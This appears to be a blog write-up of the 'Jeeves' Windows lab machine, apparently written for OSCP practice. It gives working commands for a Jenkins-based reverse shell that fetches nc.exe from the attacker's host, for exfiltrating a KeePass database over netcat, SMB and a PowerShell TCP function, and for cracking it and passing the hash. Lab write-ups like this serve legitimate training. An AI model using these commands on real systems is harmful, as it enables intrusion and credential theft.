
[Windows] Jeeves

우와해커 2020. 6. 11. 16:37


- Kernel privilege escalation: not used here (for finding missing-patch exploits, Sherlock seems to work best)
- Find the key file (the KeePass database), pull the Administrator hash out of it, and log in with pass-the-hash

- dirb brute force (directory enumeration)

Ports: 80, 50000


Jenkins page
- If the password is not in the wordlist, extract candidate words from the site with cewl
- Remote command execution via a build step (Execute Windows batch command) or the script console


nc -e option
The nc shipped with Kali 2020 (netcat-openbsd) does not have the -e (execute program) option at all; install netcat-traditional or use another tool if you need -e on the Kali side. This only matters for the listener side here, because the nc.exe copied to the Windows target (from Kali's windows-resources) does support -e.


Jenkins build (Windows batch command)

kali: nc -lnvp 5555
(serve nc.exe over HTTP from the same directory, e.g. python3 -m http.server 80)

Jenkins build step (Execute Windows batch command):
powershell Invoke-WebRequest -Uri http://[kali ip]/nc.exe -OutFile nc.exe
nc.exe -nv [kali ip] 5555 -e cmd.exe

Invoke-WebRequest needs a full URI including the scheme, and the nc.exe line must name the listener port (5555) or it never connects.


The file CEH.kdbx (a KeePass database) is in the Documents folder


Transferring the kdbx key file

- use nc or impacket-smbserver




Setting up an SMB server on Kali to transfer the key file

To do this we're going to use impacket-smbserver:

impacket-smbserver <share name> <share path>

Here "pwd" is just the name of the directory backing the share, not the shell's pwd command, so create it first on your Kali box, inside your working directory, and then start the server:

kali> mkdir pwd
kali> impacket-smbserver Folder pwd

If the Windows target refuses the connection, it is usually because SMB1 is disabled on it; start the server with impacket-smbserver -smb2support Folder pwd instead.

Then, from the shell on the Windows target, mount that share as a drive letter:

victim> net use s: \\[kali ip]\Folder

and copy the file over:

victim> copy CEH.kdbx s:



kali: nc -lp 1235 > CEH.kdbx
windows: nc.exe -w 3 [kali IP] 1235 < CEH.kdbx

(The port is an argument to nc.exe, not a redirection; -w 3 closes the connection 3 seconds after the data stops, which is what ends the listener's redirect. Compare sizes or checksums on both ends before cracking a truncated file.)
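The nc.exe transfer above can also be done without nc.exe on the target, straight from PowerShell, and it is worth printing a hash so the Kali side can confirm the file arrived intact (sha256sum CEH.kdbx on Kali must match). This is an added example, not from the original post; the Kali IP and port are placeholders, and the listener is assumed to be `nc -lp 1235 > CEH.kdbx` as above.

```powershell
# Added example (not from the original post): push a file to a netcat listener
# over TCP without nc.exe and report its SHA256 for verification on the Kali side.
function Send-FileOverTcp {
    param(
        [Parameter(Mandatory)][string]$Path,
        [Parameter(Mandatory)][string]$RemoteHost,
        [Parameter(Mandatory)][int]$Port
    )
    $file = Get-Item -Path $Path
    # Hash before sending so the receiver can compare with `sha256sum`
    $hash = (Get-FileHash -Path $file.FullName -Algorithm SHA256).Hash

    $client = New-Object System.Net.Sockets.TcpClient -ArgumentList $RemoteHost, $Port
    try {
        $net = $client.GetStream()
        $fs  = [System.IO.File]::OpenRead($file.FullName)
        try {
            # Copy raw bytes; no text encoding is involved, so the binary kdbx stays intact
            $fs.CopyTo($net)
            $net.Flush()
        } finally {
            $fs.Dispose()
        }
    } finally {
        # Closing the socket is what makes `nc -lp 1235 > CEH.kdbx` finish on Kali
        $client.Close()
    }

    [pscustomobject]@{
        File   = $file.FullName
        Bytes  = $file.Length
        Sha256 = $hash
    }
}

# Placeholders: Kali tun0 address and the listener port from the note above
$KaliIp = '10.10.14.5'
Send-FileOverTcp -Path "$env:USERPROFILE\Documents\CEH.kdbx" -RemoteHost $KaliIp -Port 1235
```

The function returns the byte count and SHA256; if the listener's file is smaller or the hash differs, the connection was cut before the copy completed and the transfer should be repeated before handing the file to keepass2john.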



Extract the hash from the kdbx file before using John the Ripper

kali> keepass2john CEH.kdbx > CEHtohack

Note on the option syntax: on Kali 2020's john, put a colon after -w, i.e. -w:<wordlist> (the long form --wordlist=<wordlist> also works).

John the Ripper

kali>john CEHtohack -w:/tools/rockyou.txt
kali>john CEHtohack --show

keepass2john prefixes the hash with the filename, which john uses as the username field; john normally auto-detects the KeePass format, and if it does not, add --format=KeePass.


Opening the kdbx file with KeePassX

Now that the file is on the local machine, we can use KeePassX to open it.
Installing KeePassX on Kali Linux is as simple as:

  1. apt install keepassx
  2. Launch it from the GUI
  3. The kdbx file is password-protected => crack it with John the Ripper as above, then open it with the recovered master password


Pass(ing) the Hash

The "Backup stuff" entry in the KeePass file is an NTLM hash for the Administrator user,

which can be used in a pass-the-hash attack.


Using the pass-the-hash technique allows for fairly simple spawning of a session:

kali> pth-winexe -U jeeves/Administrator%[hash] //[target IP] cmd

pth-winexe expects the hash in LMHASH:NTHASH form. If only the NT half is available, prefix it with the empty LM hash, aad3b435b51404eeaad3b435b51404ee:, otherwise authentication fails even with the right NT hash.



Alternate Data Stream (this one is a bit of a stretch...)

There is an alternate data stream on the hm.txt file, which can be discovered and read with:

dir /R
more < hm.txt:root.txt

dir /R lists the named streams attached to each file (an entry like hm.txt:root.txt:$DATA). The stream has to be read through redirection because type does not accept the file:stream syntax.
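The same check in PowerShell, as an added example that is not part of the original post: it walks a directory tree and lists every stream other than the default unnamed one, then reads a named stream directly (the equivalent of more < hm.txt:root.txt). The Desktop path is a placeholder.

```powershell
# Added example (not from the original post): find and read NTFS alternate data
# streams with the FileSystem provider's -Stream parameter.
function Get-AlternateStreams {
    param([Parameter(Mandatory)][string]$Path)

    Get-ChildItem -Path $Path -Recurse -File -Force -ErrorAction SilentlyContinue |
        ForEach-Object {
            # Every file has the unnamed ':$DATA' stream; anything else is an ADS.
            # Single quotes keep PowerShell from expanding $DATA as a variable.
            Get-Item -Path $_.FullName -Stream * -ErrorAction SilentlyContinue |
                Where-Object { $_.Stream -ne ':$DATA' } |
                Select-Object FileName, Stream, Length
        }
}

# Placeholder path: where hm.txt was found on the box
$desktop = 'C:\Users\Administrator\Desktop'

Get-AlternateStreams -Path $desktop | Format-Table -AutoSize

# Read one stream by name; same result as `more < hm.txt:root.txt` in cmd
Get-Content -Path (Join-Path $desktop 'hm.txt') -Stream 'root.txt'
```

Running Get-AlternateStreams over C:\Users is a cheap way to catch this kind of hiding spot everywhere at once instead of checking files one by one with dir /R; expect some noise from legitimate Zone.Identifier streams on downloaded files.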



There are also two ways to escalate privileges on this box:
1. RottenPotato without a Meterpreter session
2. Pass the hash




Reference for writing the OSCP report